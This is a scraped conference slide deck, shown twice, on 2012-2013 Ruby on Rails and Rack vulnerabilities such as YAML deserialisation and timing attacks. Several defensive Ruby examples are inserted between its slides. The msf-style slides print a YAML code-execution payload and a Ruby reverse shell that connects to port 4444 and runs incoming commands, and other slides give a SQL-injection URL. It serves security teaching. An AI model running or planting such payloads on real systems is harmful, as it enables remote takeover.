What happened to Ruby-on-Rails?
Louis Nyffenegger
louis@pentesterlab.com
@snyff
About me...
● Independent security consultant:
   ○ Code review
   ○ Training
   ○ Penetration testing


● Work on really cool stuff in my free time:
   ○ https://pentesterlab.com/exercises
   ○ https://pentesterlab.com/bootcamp/
Ruby-On-Rails
● Ruby framework to develop web applications

● Protects against most common web security issues:
  ○ SQL injections
  ○ Cross-Site Scripting
  ○ Cross-Site Request Forgery


● Good reputation... including security wise
What happened to Rails?
● Recently a lot of vulnerabilities have been
  published in Ruby-On-Rails

● In the past, most vulnerabilities were low-risk
  issues, nothing really bad

● This time we're talking remote code
  execution
Rails Security: The usual suspects...
@benmmurphy, @joernchen, @tenderlove, @homakov, @charliesome, @postmodern_mod3
Non technical reasons
● People assumed it was secure

● More and more used:
  ○ more users -> more targeted
  ○ if an application didn't get any bug published it's
    probably because no one cares


● A lot of Ruby hackers:
  ○ Ruby-on-Rails devs
  ○ People looking for bugs in Ruby-on-Rails and Ruby-on-Rails applications
It all started... CVE-2012-5664
● Talk from Joernchen (Phenoelit) at ZeroNights:
    "Let me github that for you" (21/12/2012)

● Rack Session (used by Rails):
  ○ base64(Marshal(data))--HMAC-SHA1(base64(Marshal(data)), secret)


● PentesterLab's exercise on this:
  https://pentesterlab.com/rack_cookies_and_commands_injection.html
It all started... CVE-2012-5664
● Session's secret exposed on Github:
   ○ Arbitrary session modifications
   ○ SQL injection if you know the secret and the application
     uses authlogic


● Limited risk based on this... in theory
It all started... CVE-2012-5664
● As always... Twitter started screaming and
  loling on this bug...
   ○ signal vs noise :/


● A lot of people (including me) thought it was
  only exploitable in this condition:
  http://blog.pentesterlab.com/2013/01/on-exploiting-cve-2012-5664.html
  http://blog.phusion.nl/2013/01/03/rails-sql-injection-vulnerability-hold-your-horses-here-are-the-facts/
It all started... CVE-2012-5664
● If you want to do something like:
  http://vulnerable/id[:select]=password from users
● Rails prevents this
  ○ if you submit a hash, all keys get converted to
    Strings.
  ○ then, Rails checks that the keys submitted are valid
    symbols (ActiveSupport's core extension of Hash):
  class Hash
    def assert_valid_keys(*valid_keys)
      unknown_keys = keys - [valid_keys].flatten
      raise(ArgumentError, "Unknown key(s): #{unknown_keys.join(", ")}") unless unknown_keys.empty?
    end
  end
It all could have happily stopped here...

but people started digging to find a
way around this...
And turned out...
● Rails can do a LOT of stuff...
   ○ parse traditional requests
   ○ parse XML requests
   ○ parse JSON requests



● And you can send YAML inside JSON and
  XML requests...
YAML
● "YAML is a human-readable data serialization format" (Wikipedia).

     ---
     receipt: Oz-Ware Purchase Invoice
     date:      2007-08-06
     customer:
         given: Dorothy
         family: Gale
YAML inside XML...

<?xml version="1.0" encoding="UTF-8"?>
<blah type="yaml">--- !ruby/hash:...
</blah>
From YAML to code execution
● To translate that in the OS world:
  "you have FTP access to a system and want
     to get commands execution from it"

● Need to find a way to inject code and get it
  executed...

● Many methods, more or less reliable depending
  on the version of Ruby and Ruby-On-Rails
From YAML to code execution: msf way
<SWfzexMD type='yaml'>--- !ruby/hash:
ActionController::Routing::RouteSet::
NamedRouteCollection 'XIH; eval(%[Y29k...
KZW5k].unpack(%[m0])[0]);' : !ruby/object:
ActionController::Routing::Route
 segments: []
 requirements:
  :tFuEk:
     :jyWUTgfc: :CAxk
</SWfzexMD>
 
From YAML to code execution: msf way
● You basically inject code that will get
  evaluated by Ruby-On-Rails automatically

● The same vulnerability can also be used to
  get SQL injection using Arel

● From the code evaluated, msf does its usual
  stuff:
  ○ fork
  ○ connect back
From YAML to code execution: msf way
code = %(cmVxdW...ml9).unpack(%(m0)).first
if RUBY_PLATFORM =~ /mswin|mingw|win32/
[...]
else
  if ! Process.fork()
     eval(code) rescue nil
  end
end
From YAML to code execution: msf way
require 'socket';
c=TCPSocket.new("[::1]","4444");
$stdin.reopen(c);
$stdout.reopen(c); $stderr.reopen(c);
$stdin.each_line {|l|
    l=l.strip
    next if l.length==0
    system(l)
}
CVE-2013-0156... only POST?
● Only POST?
   ○ you need to send the XML in the body of the
     request...


● You can do a POST request and use the HTTP
  header "X-HTTP-Method-Override: get" to get
  Rails to use your payload as if it was in a
  GET request
CVE-2013-0155
● "Unsafe Query Generation Risk in Ruby on
  Rails" (not SQL injection) using JSON
● Depends on the code used
  user = User.find_by_token(params[:token])
  -> SELECT * FROM users where token=...

● You can manipulate the query using JSON
  to remove the WHERE statement:
  -> SELECT * FROM users
Rack
● "Rack provides a minimal interface between
  web servers supporting Ruby and Ruby
  frameworks."

● Used by Rails and other frameworks

● Two vulnerabilities published in the same
  period:
  ○ CVE-2013-0262
  ○ CVE-2013-0263 (already reported in 2009)
Rack... CVE-2013-0263

def digest_match?(data, digest)
  return unless data && digest
  @secrets.any? do |secret|
    digest == generate_hmac(data, secret)
  end
end
Rack... CVE-2013-0263
● Timing attack...
  ○ Create a malicious value
  ○ Bruteforce a valid HMAC
    ■ send HMAC "aaaaaaaaaaa..."
    ■ send HMAC "baaaaaaaaaa..."
    ■ send HMAC "caaaaaaaaaa..."
    ■ ...
    ■ compare responses' time


● Unlikely from Internet
  ○ "intercloud" attacks...
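The Rack session format from the CVE-2012-5664 slides and the comparison fixed for CVE-2013-0263, worked through as an added example (not code from the slides or from Rack): the cookie is base64(Marshal(data))--HMAC-SHA1(...), Marshal.load only runs once the HMAC verifies, and the HMAC check runs in constant time. `secure_compare`, `encode_cookie`, `decode_cookie` and the demo secret are this example's own constructions, modelled on the kind of fix Rack shipped.

```ruby
require 'openssl'

# Added example (not from the slides or from Rack). A Rack-1.x style signed
# cookie, base64(Marshal(data))--HMAC-SHA1(base64(Marshal(data)), secret),
# verified with a constant-time comparison instead of String#==.

def generate_hmac(data, secret)
  OpenSSL::HMAC.hexdigest('SHA1', secret, data)
end

# Serialise and sign. Only the HMAC stands between an attacker and
# Marshal.load, which is why a leaked secret (CVE-2012-5664) means
# arbitrary session modification.
def encode_cookie(session, secret)
  payload = [Marshal.dump(session)].pack('m0')
  "#{payload}--#{generate_hmac(payload, secret)}"
end

# Vulnerable shape from the slide: String#== returns as soon as one byte
# differs, so response time leaks how many leading bytes were right.
def digest_match_leaky?(data, digest, secrets)
  return false unless data && digest
  secrets.any? { |secret| digest == generate_hmac(data, secret) }
end

# Constant-time comparison: always touches every byte, so the time taken
# does not depend on where the first mismatch is. Length is compared first;
# the digest length is public anyway.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  left = a.unpack('C*')
  result = 0
  b.each_byte { |byte| result |= byte ^ left.shift }
  result == 0
end

# Fixed shape: same logic as digest_match_leaky? with the comparison
# swapped. secrets is an Array so an old secret can still be accepted
# while rotating to a new one.
def digest_match?(data, digest, secrets)
  return false unless data && digest
  secrets.any? { |secret| secure_compare(digest, generate_hmac(data, secret)) }
end

# Returns the session Hash, or nil if the signature does not verify.
# Marshal.load runs only after the HMAC has been checked.
def decode_cookie(cookie, secrets)
  payload, sep, digest = cookie.rpartition('--')
  return nil if sep.empty? || !digest_match?(payload, digest, secrets)
  Marshal.load(payload.unpack1('m0'))
end

if __FILE__ == $PROGRAM_NAME
  secret = 'constructed-demo-secret' # constructed for the demo, not a real secret
  cookie = encode_cookie({ 'user_id' => 42 }, secret)
  puts cookie
  p decode_cookie(cookie, [secret])                                 # => {"user_id"=>42}
  p decode_cookie(cookie.sub(/--.*\z/, '--' + 'a' * 40), [secret])  # => nil
end
```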
CVE-2013-0277
● Rails allows developers to store serialized
  data easily:
  class Post < ActiveRecord::Base
    serialize :tags
  end

● Turns out the serialisation is done using
  YAML... If a user can manipulate this
  parameter... game over :/
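For both the type="yaml" payload slides and the `serialize :tags` column above, this added example (not code from the slides or from Rails) shows the loader to use for anything user-controlled: `Psych.safe_load` with an explicit class allow-list, which refuses every `!ruby/object:` and `!ruby/hash:` tag and the symbol keys the payload relies on. `load_untrusted_yaml`, `inspect_yaml`, `PERMITTED` and the placeholder class names are this example's own; the sample documents are constructed from the slides' shapes.

```ruby
require 'yaml'
require 'date'

# Added example (not from the slides). The payloads on the previous slides
# only work because the parser honours !ruby/object: and !ruby/hash: tags and
# revives whatever class they name. Psych.safe_load rejects every such tag
# unless the class is explicitly permitted, so it is the loader for anything
# user-controlled: a type="yaml" XML node, a `serialize` column, metadata.gz.

# Classes untrusted documents may produce. Date is included because a bare
# 2007-08-06 scalar is revived as a Date object and would otherwise be
# rejected as well. Symbol is deliberately absent: the msf-style payload
# depends on symbol keys such as :tFuEk.
PERMITTED = [Date].freeze

def load_untrusted_yaml(text)
  YAML.safe_load(text, permitted_classes: PERMITTED, aliases: false)
end

# Wraps the loader so callers get a verdict instead of an exception.
# Returns [:ok, data], [:rejected, class_name] or [:invalid, message].
def inspect_yaml(text)
  [:ok, load_untrusted_yaml(text)]
rescue Psych::DisallowedClass => e
  # Message has the form "Tried to load unspecified class: Foo".
  [:rejected, e.message.split(': ').last]
rescue Psych::BadAlias, Psych::SyntaxError => e
  [:invalid, e.message]
end

# Constructed inputs, modelled on the slides' YAML sample and on the tag
# shapes used in the XML payloads (class names are placeholders).
BENIGN = <<~YAML
  ---
  receipt: Oz-Ware Purchase Invoice
  date: 2007-08-06
  customer:
    given: Dorothy
    family: Gale
YAML

TAGGED_OBJECT = "--- !ruby/object:SomePlaceholderClass\nfoo: bar\n"
TAGGED_HASH   = "--- !ruby/hash:SomePlaceholderClass\nfoo: bar\n"
SYMBOL_KEYS   = "---\n:tFuEk:\n  :jyWUTgfc: :CAxk\n"

if __FILE__ == $PROGRAM_NAME
  [BENIGN, TAGGED_OBJECT, TAGGED_HASH, SYMBOL_KEYS].each do |doc|
    p inspect_yaml(doc)
  end
end
```

On Ruby 3.1+ `YAML.load` already behaves like `safe_load`; on older Rubies it is the unrestricted loader, so call `safe_load` explicitly.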
Rack... CVE-2013-0262
● Directory traversal in Rack::File

● When I looked at the bug I found an XSS in
  the same code
   ○ and another one in similar code in another file:
     fail(404, "File not found: #{path_info}")
   ○ and the fact that Rack follows symlinks


● Turns out this is used by BeEF... Content-Type:
  text/plain limits impact tho
Rubygems.org compromised
● Gem == ruby library

● Rubygems is like a Debian mirror for Ruby

● Information about a package is stored inside a
  metadata.gz, which is a compressed YAML file...
  and this information gets displayed on the
  website:
  ○ Someone uploaded an "exploit.gem"...
So what to do from now?
● ".to_s all the things"
   ○ most of the issues come from the mapping
     performed by Ruby-On-Rails


● Upgrade... (bundler-audit)

● Remove parsers you don't need:
ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::XML)
ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::JSON)
And since we are talking about Rails
● Someone recently put together all the ways to
  have vulnerable code in Ruby-on-Rails:
  http://rails-sqli.org/
● You should also check Meder's Ruby Security
  Reviewer's Guide:
  http://code.google.com/p/ruby-security/wiki/Guide
Ruxmon feb 2013   what happened to rails

GenAI Risks & Security Meetup 01052024.pdf
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 

Ruxmon feb 2013 what happened to rails

  • 1. What happened to Ruby-on-Rails?
    Louis Nyffenegger
    louis@pentesterlab.com
    @snyff
  • 2. About me...
    ● Independent security consultant:
      ○ Code review
      ○ Training
      ○ Penetration testing
    ● Work on really cool stuff in my free time:
      ○ https://pentesterlab.com/exercises
      ○ https://pentesterlab.com/bootcamp/
  • 3. Ruby-On-Rails
    ● Ruby framework to develop web applications
    ● Protect from most web security issues:
      ○ SQL injections
      ○ Cross-Site Scripting
      ○ Cross-Site Request Forgery
    ● Good reputation... including security wise
  • 4. What happened to Rails?
    ● Recently a lot of vulnerabilities have been published in Ruby-On-Rails
    ● In the past, most vulnerabilities were low-risk issues but nothing really bad
    ● This time we're talking remote code execution
  • 5. Rails Security: The usual suspects...
    @benmmurphy @joernchen @tenderlove @homakov @charliesome @postmodern_mod3
  • 6. Non technical reasons
    ● People assumed it was secure
    ● More and more used:
      ○ more users -> more targeted
      ○ if an application didn't get any bug published it's probably because no one cares
    ● A lot of Ruby hackers:
      ○ Ruby-on-Rails devs
      ○ People looking for bugs in Ruby-on-Rails and Ruby-on-Rails applications
  • 7. It all started... CVE-2012-5664
    ● Talk from Joernchen (Phenoelit) at ZeroNights: "Let me github that for you" (21/12/2012)
    ● Rack Session (used by Rails):
      ○ base64(Marshal(data))--HMAC(SHA1(base64(Marshal(data)), secret)
    ● PentesterLab's exercise on this: https://pentesterlab.com/rack_cookies_and_commands_injection.html
  • 8. It all started... CVE-2012-5664
    ● Session's secret exposed on Github:
      ○ Arbitrary session modifications
      ○ SQL injection if you know the secret and the application uses authlogic
    ● Limited risk based on this... in theory
  • 9. It all started... CVE-2012-5664
    ● As always... Twitter started screaming and loling on this bug...
      ○ signal vs noise :/
    ● A lot of people (including me) thought it was only exploitable in this condition:
      http://blog.pentesterlab.com/2013/01/on-exploiting-cve-2012-5664.html
      http://blog.phusion.nl/2013/01/03/rails-sql-injection-vulnerability-hold-your-horses-here-are-the-facts/
  • 10. It all started... CVE-2012-5664
    ● If you want to do something like:
      http://vulnerable/id[:select]=password from users
    ● Rails prevents this
      ○ if you submit a hash, all keys get converted to Strings.
      ○ then, Rails checks that the keys submitted are valid symbols:
        def assert_valid_keys(*valid_keys)
          unknown_keys = keys - [valid_keys].flatten
          raise(ArgumentError, "Unknown key(s): #{unknown_keys.join(", ")}") unless unknown_keys.empty?
        end
  • 11. All could have happily stopped here... but people started digging to find a way around this...
  • 12. And turned out...
    ● Rails can do a LOT of stuff...
      ○ parse traditional requests
      ○ parse XML requests
      ○ parse JSON requests
    ● And you can send YAML inside JSON and XML requests...
  • 13. YAML
    ● "YAML is a human-readable data serialization format" (Wikipedia).
      ---
      receipt: Oz-Ware Purchase Invoice
      date: 2007-08-06
      customer:
        given: Dorothy
        family: Gale
  • 14. YAML inside XML...
      <?xml version="1.0" encoding="UTF-8"?>
      <blah type="yaml">--- !ruby/hash:... </blah>
  • 15. From YAML to code execution
    ● To translate that in the OS world: "you have FTP access to a system and want to get command execution from it"
    ● Need to find a way to inject code and get it executed...
    ● Many methods, more or less reliable depending on the version of Ruby and Ruby-On-Rails
  • 16. From YAML to code execution: msf way
      <SWfzexMD type='yaml'>--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
      'XIH; eval(%[Y29k... KZW5k].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route
        segments: []
        requirements:
          :tFuEk:
            :jyWUTgfc: :CAxk
      </SWfzexMD>
  • 17. From YAML to code execution: msf way
    ● You basically inject code that will get evaluated by Ruby-On-Rails automatically
    ● The same vulnerability can also be used to get SQL injection using Arel
    ● From the code evaluated, msf does its usual stuff:
      ○ fork
      ○ connect back
  • 18. From YAML to code execution: msf way
      code = %(cmVxdW...ml9).unpack(%(m0)).first
      if RUBY_PLATFORM =~ /mswin|mingw|win32/
        [...]
      else
        if ! Process.fork()
          eval(code) rescue nil
        end
      end
  • 19. From YAML to code execution: msf way
      require 'socket'
      c=TCPSocket.new("[::1]","4444")
      $stdin.reopen(c)
      $stdout.reopen(c)
      $stderr.reopen(c)
      $stdin.each_line {|l|
        l=l.strip
        next if l.length==0
        system(l)
      }
  • 20. CVE-2013-0156... only POST?
    ● Only POST?
      ○ you need to send the XML in the body of the request...
    ● You can do a POST request and use the HTTP header "X-HTTP-Method-Override: get" to get Rails to use your payload as if it was in a GET request
  • 21. CVE-2013-0155
    ● "Unsafe Query Generation Risk in Ruby on Rails" (not SQL injection) using JSON
    ● Depends on the code used
      user = User.find_by_token(params[:token])
      -> SELECT * FROM users where token=...
    ● You can manipulate the query using JSON to remove the WHERE statement:
      -> SELECT * FROM users
  • 22. Rack
    ● "Rack provides a minimal interface between web servers supporting Ruby and Ruby frameworks."
    ● Used by Rails and other frameworks
    ● Two vulnerabilities published in the same period:
      ○ CVE-2013-0262
      ○ CVE-2013-0263 (already reported in 2009)
  • 23. Rack... CVE-2013-0263
      def digest_match?(data, digest)
        return unless data && digest
        @secrets.any? do |secret|
          digest == generate_hmac(data, secret)
        end
      end
  • 24. Rack... CVE-2013-0263
    ● Timing attack...
      ○ Create a malicious value
      ○ Bruteforce a valid HMAC
        ■ send HMAC "aaaaaaaaaaa..."
        ■ send HMAC "baaaaaaaaaa..."
        ■ send HMAC "caaaaaaaaaa..."
        ■ ...
        ■ compare responses' time
    ● Unlikely from Internet
      ○ "intercloud" attacks...
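The cookie layout from slide 7 (base64(Marshal(data))--HMAC), the secret exposure from slide 8 and the `digest ==` comparison from slides 23 and 24 fit in one added example. This is not Rack's or Rails' code: it is a Rack-style session cookie written from scratch for this page, with two constructed secrets, a constructed session hash, and the hypothetical function names `encode_session`, `decode_session`, `secure_compare` and `digest_match?`. It shows the two defensive points the slides lead to: the signature is checked in constant time, and it is checked before Marshal.load ever touches the payload; a rotated secret rejects old cookies unless the old secret is still in the accepted list.

```ruby
require 'openssl'

# Constructed secrets for the demo; a real application keeps these out of git.
CURRENT_SECRET = "constructed-secret-do-not-reuse"
ROTATED_SECRET = "constructed-secret-after-rotation"

# HMAC-SHA1 over the base64 data part, as in the slide 7 cookie layout.
def generate_hmac(data, secret)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('sha1'), secret, data)
end

# Constant-time comparison, the fix for `digest == generate_hmac(...)` on
# slide 23: every byte is visited regardless of where the first mismatch is,
# so response time does not leak how many leading characters were right.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  left = a.unpack("C*")
  acc = 0
  b.each_byte { |byte| acc |= byte ^ left.shift }
  acc == 0
end

# Accepts a cookie signed with any of the given secrets, which is how a
# secret rotation is rolled out without dropping every live session.
def digest_match?(data, digest, secrets)
  return false unless data && digest
  secrets.any? { |secret| secure_compare(digest, generate_hmac(data, secret)) }
end

# pack("m0") is strict base64 without newlines (the same %[m0] seen on slide 16).
def encode_session(session, secret)
  data = [Marshal.dump(session)].pack("m0")
  "#{data}--#{generate_hmac(data, secret)}"
end

# Verify first, deserialize second: Marshal.load must never see a payload
# whose signature has not been checked. Returns nil for anything unsigned,
# tampered with, or signed with a secret that is no longer accepted.
def decode_session(cookie, secrets)
  data, digest = cookie.to_s.split("--", 2)
  return nil unless digest_match?(data, digest, secrets)
  Marshal.load(data.unpack1("m0"))
end

if $PROGRAM_NAME == __FILE__
  cookie = encode_session({ "user_id" => 42 }, CURRENT_SECRET)
  puts cookie
  p decode_session(cookie, [CURRENT_SECRET])                   # => {"user_id"=>42}
  p decode_session(cookie, [ROTATED_SECRET])                   # => nil
  p decode_session(cookie, [ROTATED_SECRET, CURRENT_SECRET])   # => {"user_id"=>42}
end
```

The rotation list is ordered newest-first on purpose: a cookie signed with the old secret still verifies, but anything new is signed with the current one, and dropping the old secret from the list is all it takes to finish the rotation once it has leaked.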
  • 25. CVE-2013-0277
    ● Rails allows developers to store serialized data easily:
      class Post < ActiveRecord::Base
        serialize :tags
      end
    ● Turns out the serialisation is done using YAML... If a user can manipulate this parameter... game over :/
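Slides 12 to 16 and slide 25 (and the Rubygems metadata.gz on slide 27) all come down to untrusted YAML reaching a loader that will instantiate whatever class a `!ruby/...` tag names. The added example below is not code from the talk or from Rails: it parses the invoice document from slide 13 with an allow-list loader, shows that a tagged document is refused before any object is built, and wraps the same loader in a coder class usable as `serialize :tags, SafeYamlCoder`. The `!ruby/object:Object` document is a constructed stand-in for the payloads on slides 14 and 16, and `load_untrusted_yaml`, `classify_yaml` and `SafeYamlCoder` are names chosen for this page.

```ruby
require 'yaml'
require 'date'

# The invoice from slide 13, used as the benign input.
INVOICE_YAML = <<~YAML
  ---
  receipt: Oz-Ware Purchase Invoice
  date: 2007-08-06
  customer:
    given: Dorothy
    family: Gale
YAML

# Constructed stand-in for a tagged payload: it names a class, nothing more.
TAGGED_YAML = <<~YAML
  --- !ruby/object:Object
  x: 1
YAML

# Allow-list loader: scalars, arrays, hashes and (because the invoice carries
# one) Date. Any !ruby/... tag naming another class raises
# Psych::DisallowedClass before the object is allocated.
def load_untrusted_yaml(text)
  YAML.safe_load(text, permitted_classes: [Date], aliases: false)
end

# Coder with the dump/load contract ActiveRecord's serialize accepts
# (`serialize :tags, SafeYamlCoder`): same safe loader on the way in,
# plain YAML.dump on the way out.
class SafeYamlCoder
  def self.dump(obj)
    YAML.dump(obj)
  end

  def self.load(text)
    return nil if text.nil?
    load_untrusted_yaml(text)
  end
end

# [:ok, data] for documents the allow-list accepts, [:rejected, message]
# when a tag tried to load a class outside it.
def classify_yaml(text)
  [:ok, load_untrusted_yaml(text)]
rescue Psych::DisallowedClass => e
  [:rejected, e.message]
end

if $PROGRAM_NAME == __FILE__
  p classify_yaml(INVOICE_YAML)
  p classify_yaml(TAGGED_YAML)
  p SafeYamlCoder.load(SafeYamlCoder.dump(%w[rails yaml]))
end
```

Note the Date entry in `permitted_classes`: `safe_load` refuses even the invoice's `2007-08-06` without it, which is the usual first surprise when switching a YAML column from `YAML.load`, so the allow-list has to be written from the data the column actually holds rather than left empty.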
  • 26. Rack... CVE-2013-0262
    ● Directory traversal in Rack::File
    ● When I looked at the bug I found an XSS in the same code
      ○ and another one in similar code in another file
        fail(404, "File not found: #{path_info}")
      ○ and the fact that rack follows symlinks
    ● Turns out this is used by BEEF... Content-Type: text/plain limits impact tho
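For the three Rack::File points on slide 26 (traversal, symlinks, the raw `path_info` in the 404 body), here is an added example of the checks a static-file handler needs; it is not Rack's code, the document root `/srv/constructed-webroot` and the request paths are constructed, and `safe_path`, `under_root?` and `not_found_body` are names chosen for this page. `path_info` is assumed to be already percent-decoded, as it is by the time Rack hands it to a file handler.

```ruby
require 'cgi'

# True when `path` is `root` itself or sits below it (prefix check includes
# the separator so /srv/www-evil does not pass for /srv/www).
def under_root?(path, root)
  path == root || path.start_with?(root + File::SEPARATOR)
end

# Absolute path to serve, or nil when path_info escapes the document root.
# Traversal is caught by normalising with expand_path; symlinks ("rack follows
# symlinks") are caught by resolving with realpath when the target exists.
def safe_path(root, path_info)
  root = File.exist?(root) ? File.realpath(root) : File.expand_path(root)
  full = File.expand_path(File.join(root, path_info))
  return nil unless under_root?(full, root)
  full = File.realpath(full) if File.exist?(full)
  return nil unless under_root?(full, root)
  full
end

# The 404 on slide 26 interpolated path_info raw into the body; escaping it
# closes the XSS even when the response is served with an HTML content type.
def not_found_body(path_info)
  "File not found: #{CGI.escapeHTML(path_info)}"
end

if $PROGRAM_NAME == __FILE__
  root = "/srv/constructed-webroot"
  p safe_path(root, "/css/app.css")          # => "/srv/constructed-webroot/css/app.css"
  p safe_path(root, "/../etc/passwd")        # => nil
  puts not_found_body("<script>alert(1)</script>")
end
```

Both checks compare against the resolved root rather than the string the handler was configured with, so a root that is itself a symlink does not make every legitimate file look like an escape.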
  • 27. Rubygems.org compromised
    ● Gem == ruby library
    ● Rubygems is like a Debian mirror for Ruby
    ● Information about a package is stored inside a metadata.gz which is a compressed YAML file... and this information gets displayed on the website:
      ○ Someone uploaded an "exploit.gem"...
  • 28. So what to do from now?
    ● ".to_s all the things"
      ○ most of the issues come from the mapping performed by Ruby-On-Rails
    ● Upgrade... (bundler-audit)
    ● Remove parsers you don't need:
      ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::XML)
      ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::JSON)
  • 29. And since we are talking about Rails
    Someone recently put together all the ways to have vulnerable code in Ruby-on-Rails: http://rails-sqli.org/
    You should also check Meder's Ruby Security Reviewer's Guide: http://code.google.com/p/ruby-security/wiki/Guide
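The ".to_s all the things" advice on slide 28 is the counterpart of the `find_by_token(params[:token])` case on slide 21 and the `id[:select]` hash on slide 10: a JSON or XML body can deliver nil, an Array or a Hash where the controller expected a String. The added example below (not the talk's or Rails' code) parses four constructed request bodies and shows both guards: reject anything that is not a String, or coerce it with `to_s` so a structured value becomes an inert literal. `string_param`, `coerced_param`, `classify` and `BadParameter` are names chosen for this page.

```ruby
require 'json'

class BadParameter < StandardError; end

# Strict guard: the parameter must be a plain String. nil, Array and Hash,
# the shapes a JSON body can smuggle in, are rejected before they can reach
# a finder and change the shape of the generated query.
def string_param(params, key)
  value = params[key]
  unless value.is_a?(String)
    raise BadParameter, "#{key} must be a String, got #{value.class}"
  end
  value
end

# ".to_s all the things": coerce instead of reject. [nil] becomes the literal
# "[nil]" and a hash becomes its inspect string, neither of which can alter
# the WHERE clause; nil becomes "" rather than disappearing from the query.
def coerced_param(params, key)
  params[key].to_s
end

# Constructed request bodies, not captured traffic.
BODIES = {
  legit: '{"token":"abc123"}',
  null:  '{"token":null}',
  array: '{"token":[null]}',
  hash:  '{"token":{"select":"password"}}',
}.freeze

# Parse a body and run the strict guard; returns the token or the rejection
# message so the four cases can be compared side by side.
def classify(body)
  params = JSON.parse(body)
  string_param(params, "token")
rescue BadParameter => e
  e.message
end

if $PROGRAM_NAME == __FILE__
  BODIES.each do |name, body|
    puts "#{name}: strict=#{classify(body).inspect} coerced=#{coerced_param(JSON.parse(body), 'token').inspect}"
  end
end
```

Rejecting is the better default for lookups such as tokens, since a coerced `""` still hits the database with an empty-string comparison; coercion is the cheap retrofit when a code base has too many call sites to audit at once, which is the situation the slide is addressing.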